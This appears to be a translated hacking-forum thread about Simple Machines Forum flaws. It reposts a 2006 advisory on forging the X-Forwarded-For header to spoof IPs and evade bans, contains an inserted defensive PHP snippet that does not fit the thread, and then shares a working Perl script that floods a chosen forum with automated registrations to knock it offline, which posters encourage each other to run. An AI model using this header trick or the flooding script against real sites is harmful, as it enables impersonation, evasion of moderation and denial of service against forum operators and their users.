Exploit for SMF version 1.1 RC2 or below, uses the IP Spoofing technique. Normally used for evasion.
==================================================
Advisory : SMF 1.0.7 and lower plus 1.1rc2 and lower - IP spoofing
vulnerability/IP ban evasion vulnerability
Release Date : June 02, 2006
Application : SMF
Version : SMF 1.0.7 and previous versions, SMF1.1rc2 and lower
Platform : PHP
Vendor URL : http://www.simplemachines.org/
Author : Jessica Hope (jessicasaulhope (at) googlemail (dot) com [email concealed])
==================================================
Overview
The IP detection section of SMF's code allows someone to spoof the
X-Forwarded-For header.
SMF trusts this value over the IP address reported in general.
This allows an attacker to log in and post using IPs that are not theirs,
making it impossible for the Administrator of the SMF forum to ban the user.
==================================================
Discussion
There's code in QueryString.php that starts:
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
    // If there are commas, get the last one.. probably.
    if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',') !== false)
    {
        $ips = array_reverse(explode(', ', $_SERVER['HTTP_X_FORWARDED_FOR']));
        // Go through each IP...
        foreach ($ips as $i => $ip)
        {
            // Make sure it's in a valid range...
            if (preg_match('~^((0|10|172\.16|192\.168|255|127\.0)\.|unknown)~', $ip) != 0)
                continue;
            // Otherwise, we've got an IP!
            $_SERVER['REMOTE_ADDR'] = trim($ip);
            break;
        }
    }
    // Otherwise just use the only one.
    elseif (preg_match('~^((0|10|172\.16|192\.168|255|127\.0)\.|unknown)~', $_SERVER['HTTP_X_FORWARDED_FOR']) == 0)
        $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
This code is used to obtain the user's IP address. However, if the
X-Forwarded-For HTTP header has been provided,
it will take the last IP address from the X-Forwarded-For header and
blindly trust it to be the real IP address.
The problem is that the X-Forwarded-For HTTP header is easily forgeable
via a number of methods.
For example, if the X-Forwarded-For header was set:
X-Forwarded-For: 1.2.3.4
the SMF application trusts 1.2.3.4 to be their IP address, and will
reflect this fact when the user does anything that SMF logs,
such as posting to the forum. This makes it possible for a user to set
the X-Forwarded-For IP to that of another user in
an attempt to masquerade as them. It also would require the SMF
administrator to track down the user's real IP via httpd server logs,
assuming this is possible, which in some cases it is not.
This would also assume the SMF administrator knows the IP presented to
them isn't real.
On top of this, there's code in Security.php that starts:
// Check if we have a valid IP address.
if (preg_match('/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/', $user_info['ip'], $ip_parts) == 1)
{
    $ban_query[] = "(ban_type = 'ip_ban'
        AND ($ip_parts[1] BETWEEN ip_low1 AND ip_high1)
        AND ($ip_parts[2] BETWEEN ip_low2 AND ip_high2)
        AND ($ip_parts[3] BETWEEN ip_low3 AND ip_high3)
        AND ($ip_parts[4] BETWEEN ip_low4 AND ip_high4))";
    // IP was valid, maybe there's also a hostname...
    if (empty($modSettings['disableHostnameLookup']))
    {
        $hostname = @gethostbyaddr($user_info['ip']);
        if (strlen($hostname) > 0)
            $ban_query[] = "(ban_type = 'hostname_ban' AND ('$hostname' LIKE hostname))";
    }
}
This code indicates that a user could bypass bans on their IP by
setting the X-Forwarded-For header,
seeing as SMF blindly trusts the X-Forwarded-For IP to be real.
==================================================
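A hardened version of the client-IP lookup, added here as an example and not taken from SMF or from the advisory: X-Forwarded-For is only honoured when the TCP peer is one of our own reverse proxies, and the chain is walked from the right so that entries a client injected are ignored. The $trustedProxies list is an assumed deployment setting.

```php
<?php
// Added example (not SMF's code). Resolve the client IP without trusting a
// header that any client can set. $trustedProxies is an assumed setting that
// lists the reverse proxies sitting in front of the forum.
function resolveClientIp(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';

    // Direct connection (no trusted proxy in front): the header is untrusted.
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;
    }

    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '') {
        return $remote;
    }

    // Split on commas and trim; SMF split on ', ' only, so "a,b" with no
    // space slipped past its own parsing.
    $hops = array_map('trim', explode(',', $xff));

    // Walk right-to-left: the rightmost entries were appended by our proxies,
    // the first entry that is not one of them is the client the proxy saw.
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        $hop = $hops[$i];
        if (in_array($hop, $trustedProxies, true)) {
            continue;
        }
        // Reject anything that is not a literal IP ("unknown", hostnames, junk)
        // and fall back to the connection peer rather than a forged value.
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            return $remote;
        }
        return $hop;
    }
    // Every hop was one of our proxies: use the connection peer.
    return $remote;
}

$trustedProxies = ['10.0.0.5'];   // assumed proxy address

// Constructed requests: a client connecting directly while forging the header,
// and a client arriving through the proxy, which appended the real peer.
$forged   = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => '1.2.3.4'];
$viaProxy = ['REMOTE_ADDR' => '10.0.0.5',
             'HTTP_X_FORWARDED_FOR' => '1.2.3.4, 198.51.100.9'];

echo resolveClientIp($forged, $trustedProxies), "\n";    // 203.0.113.7, not 1.2.3.4
echo resolveClientIp($viaProxy, $trustedProxies), "\n";  // 198.51.100.9, not 1.2.3.4
```

The ban check in Security.php then operates on the resolved address instead of on $_SERVER['REMOTE_ADDR'] overwritten from the header, so a forged X-Forwarded-For neither masquerades as another user nor evades an IP ban.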
I believe Darkers no longer has this "vulnerability", since the administrator DarkGênesis was warned by me a while ago already.
HadeS
Yes, that Simple Machines flaw has already been fixed.
Can someone explain how this works???
Look up HTTP Headers. The flaw lets you forge your IP address on forums using the Simple Machines Forums system (//http://www.simplemachines.org/) (the same one Darkers uses), avoiding being tracked and getting past IP bans.
Hey! Look at this exploit I found:
#SMF DOS By Viran
#Attempts to Register Multiple Users on Desired SMF forum
#Works on Most Versions, can't tell you exact, did not experiment enough
#to give affected versions.
use IO::Socket;
print "SMF Multiple User Registration DoS by viran\n\n";
print q(Enter a Host Name, ex www.host.com:
);
$host = <STDIN>;
chop ($host);
print q(Enter The Forum Directory ex /smf:
);
$dir = <STDIN>;
chop ($dir);
print q(Enter a Botname:
);
$bot = <STDIN>;
chop ($bot);
while($x != 999999999999999999999999999999999999)
{
$login ="$bot$x";
$email ="blank$x";
$sticky="user=$login&email=$email%40gg.com&passwrd1=password&passwrd2=password&regagree=on&regSubmit=Register";
$lgth = length($sticky);
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
) or die "Could Not Open a Socket \n Check the Desired Host You Entered, it may be dosed";
print $sock "POST $dir/index.php?action=register2 HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Accept-Language: en-us,en;q=0.5\n";
print $sock "Accept-Encoding: gzip,deflate\n";
print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
print $sock "Keep-Alive: 300\n";
print $sock "Connection: keep-alive\n";
print $sock "Referer: http://www.$host/smf/index.php?PHPSESSID=95e0352c6697ffe00a2e829231320f3e&action=register\n";
print $sock "Cookie: PHPSESSID=95e0352c6697ffe00a2e829231320f3e\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: $lgth\n";
print $sock "$sticky\n";
close($sock);
print".";
$x++
}
This exploit causes a D.o.S. and, according to the author, most versions are vulnerable!! So I think the forum admins, if they haven't tested this exploit yet, had better test it! hehehe

To cause the D.o.S. this exploit abuses a flaw at the user registration level, with the script making multiple user registrations...
Cheers,
Thanks cypthief, I'll test it.
Quote from: "Shady"Thanks cypthief, I'll test it.
Don't worry, no, it didn't work

cheers
shady
Ok slul, thanks for testing
Hey! I was going to test it this morning! Since I'm from Portugal, I posted last night and it was already late and my parents were calling me to go to bed

because I have classes early in the morning! Ah, and thanks Slul for testing!!! After all, this exploit must not affect every version like the author says... but good thing it doesn't work against Darkers!
Cheers,